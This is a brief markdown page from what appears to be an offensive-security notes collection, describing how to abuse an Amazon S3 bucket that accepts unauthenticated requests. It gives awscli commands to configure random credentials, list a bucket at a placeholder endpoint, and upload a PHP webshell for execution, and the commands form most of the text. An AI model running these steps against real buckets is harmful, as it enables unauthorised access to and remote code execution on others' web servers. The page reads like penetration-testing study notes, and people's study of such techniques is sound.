killchain-compendium/Exploits/Databases/S3.md

AWS S3 Buckets

• awscli is the official tool

Configuration

• An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via aws configure

• List the endpoint via

aws --endpoint=http://s3.example.com s3 ls
2022-12-08 21:06:33 example.com

• List the top level domain afterwards

aws --endpoint=http://s3.example.com s3 ls s3://example.com
2022-12-08 21:06:33          0 .htaccess
2022-12-08 21:06:33      1218 index.html

• Upload a (webshell) and execute

aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com